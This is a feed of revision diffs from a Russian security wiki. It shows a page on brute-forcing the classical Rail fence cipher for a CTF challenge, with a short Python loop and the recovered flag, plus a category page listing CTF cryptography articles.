		<id>http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=172</id>
		<title>Взлом Rail fence cipher</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=172"/>
				<updated>2016-02-08T11:43:14Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: /* Пример */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Шифр '''Rail fence''' методом перебора. Для реализации можно использовать инструмент [https://github.com/TimCinel/RailFencePython RailFencePython], модифицировав тестовый файл '''testRailFence.py'''&lt;br /&gt;
&lt;br /&gt;
== Пример ==&lt;br /&gt;
Имеется зашифрованная строка:&lt;br /&gt;
AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
&lt;br /&gt;
from railFence import decryptRailFence&lt;br /&gt;
&lt;br /&gt;
for i in xrange(1,255):&lt;br /&gt;
    print decryptRailFence(&amp;quot;AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-&amp;quot;, i, 0); &lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
После запуска, просматривая вывод, можно найти строку: &lt;br /&gt;
A-fence-is-a-structure-that-encloses-an-area,-SharifCTF{QmFzZTY0IGlzIGEgZ2VuZXJpYyB0ZXJt},-typically-outdoors.&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=171</id>
		<title>Взлом Rail fence cipher</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=171"/>
				<updated>2016-02-08T11:42:34Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Шифр '''Rail fence''' методом перебора. Для реализации можно использовать инструмент [https://github.com/TimCinel/RailFencePython RailFencePython], модифицировав тестовый файл '''testRailFence.py'''&lt;br /&gt;
&lt;br /&gt;
== Пример ==&lt;br /&gt;
Имеется зашифрованная строка:&lt;br /&gt;
AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
&lt;br /&gt;
from railFence import decryptRailFence&lt;br /&gt;
&lt;br /&gt;
for i in xrange(1,255):&lt;br /&gt;
    print decryptRailFence(&amp;quot;AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-&amp;quot;, i, 0); &lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
После запуска, просматривая вывод, можно найти строку: &lt;br /&gt;
A-fence-is-a-structure-that-encloses-an-area,-SharifCTF{QmFzZTY0IGlzIGEgZ2VuZXJpYyB0ZXJt},-typically-outdoors.&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=170</id>
		<title>Взлом Rail fence cipher</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=170"/>
				<updated>2016-02-08T11:39:51Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: Новая страница: «Шифр '''Rail fence''' методом перебора. Для реализации можно использовать инструмент [https://github.co…»&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Шифр '''Rail fence''' методом перебора. Для реализации можно использовать инструмент [https://github.com/TimCinel/RailFencePython RailFencePython], модифицировав тестовый файл '''testRailFence.py'''&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=169</id>
		<title>Категория:Crypto</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=169"/>
				<updated>2016-02-08T11:35:54Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: /* Инструментарий для работы */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Список статей по криптографии для решения CTF соревнований.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Инструментарий для работы ==&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher|Взлом Rail fence cipher]]&lt;br /&gt;
&lt;br /&gt;
== Внешние ссылки ==&lt;br /&gt;
&lt;br /&gt;
[https://www.picoctf.com/crypto_mats/index.html Introduction to Cryptography]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=168</id>
		<title>Категория:Crypto</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=168"/>
				<updated>2016-02-08T11:33:26Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: /* Инструментарий для работы */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Список статей по криптографии для решения CTF соревнований.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Инструментарий для работы ==&lt;br /&gt;
[http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher Взлом Rail fence cipher]&lt;br /&gt;
&lt;br /&gt;
== Внешние ссылки ==&lt;br /&gt;
&lt;br /&gt;
[https://www.picoctf.com/crypto_mats/index.html Introduction to Cryptography]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=167</id>
		<title>Категория:Crypto</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=167"/>
				<updated>2016-02-08T11:31:13Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Список статей по криптографии для решения CTF соревнований.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Инструментарий для работы ==&lt;br /&gt;
Взлом Rail fence cipher&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Внешние ссылки ==&lt;br /&gt;
&lt;br /&gt;
[https://www.picoctf.com/crypto_mats/index.html Introduction to Cryptography]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	</feed>